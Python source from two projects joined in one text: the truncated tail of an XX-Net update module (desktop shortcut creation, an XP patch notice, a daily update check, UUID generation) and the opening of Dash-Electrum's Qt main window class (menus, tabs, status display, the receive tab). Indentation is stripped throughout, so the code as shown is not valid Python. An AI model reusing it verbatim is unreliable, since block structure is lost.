# msg = u"是否在桌面创建图标?"
# title = u"XX-Net 叉叉网"
#res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1)
# Yes:1 No:2
#if res == 2:
# return
subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False)
def notify_install_tcpz_for_winXp():
import ctypes
ctypes.windll.user32.MessageBoxW(None, u"请使用tcp-z对 tcpip.sys 打补丁,解决链接并发限制!", u"Patch XP needed", 0)
def check_new_machine():
current_path = os.path.dirname(os.path.abspath(__file__))
if current_path != config.get(["update", "last_path"], ""):
config.set(["update", "last_path"], current_path)
config.save()
if sys.platform == "win32" and platform.release() == "XP":
notify_install_tcpz_for_winXp()
if os.getenv("XXNET_NO_MESS_SYSTEM", "0") == "0":
xlog.info("generate desktop shortcut")
create_desktop_shortcut()
def check_loop():
check_new_machine()
# wait gae_proxy to start
# update need gae_proxy as proxy
time.sleep(1)
while True:
check_update()
time.sleep(3600 * 24)
def start():
p = threading.Thread(target=check_loop)
p.setDaemon(True)
p.start()
def need_new_uuid():
if not config.get(["update", "uuid"]):
xlog.info("need_new_uuid: uuid is empty")
return True
return False
def generate_new_uuid():
xx_net_uuid = str(uuid.uuid4())
config.set(["update", "uuid"], xx_net_uuid)
xlog.info("generate uuid:%s", xx_net_uuid)
config.save()
def get_uuid():
if need_new_uuid():
generate_new_uuid()
xx_net_uuid = config.get(["update", "uuid"])
xlog.info("get uuid:%s", xx_net_uuid)
return xx_net_uuid
if __name__ == "__main__":
#get_uuid()
#check_update()
#sys_tray.serve_forever()
create_desktop_shortcut()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dash.plugin import run_hook
from electrum_dash.i18n import _
from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate)
from electrum_dash.transaction import Transaction, TxOutput
from electrum_dash.address_synchronizer import AddTransactionException
from electrum_dash.wallet import Multisig_Wallet
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.masternode_manager import MasternodeManager
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
from .masternode_dialog import MasternodeDialog
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_dash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.masternode_manager = None
self.gui_object = gui_object
self.config = config = gui_object.config
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
# Disabled until API is stable.
# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals'))
tabs.setMinimumSize(1020, 500)
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
# self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# 'proposals']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
backup_file = getattr(self.wallet.storage, 'backup_file', None)
if backup_file:
backup_message = self.wallet.storage.backup_message
self.show_warning(backup_message, title=_('Information'))
if self.network.tor_auto_on and not self.network.tor_on:
self.show_warning(self.network.tor_warn_msg +
self.network.tor_docs_uri_qt)
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418; try to at least show popup:
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee', 'proposals']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
elif event == 'proposals':
self.proposals_changed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash-Electrum Testnet" if constants.net.TESTNET else "Dash-Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Dash-Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Dash-Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash-Electrum",
(_("Version")+" %s" % self.wallet.electrum_version + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/akhavr/electrum-dash/issues\">https://github.com/akhavr/electrum-dash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Dash-Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash-Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash-Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash-Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate, self.num_zeros) + ' duffs/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
self.masternode_manager.send_subscriptions()
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_proposals_tab()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'),
_('The Dash address never expires and will always be part of this Dash-Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
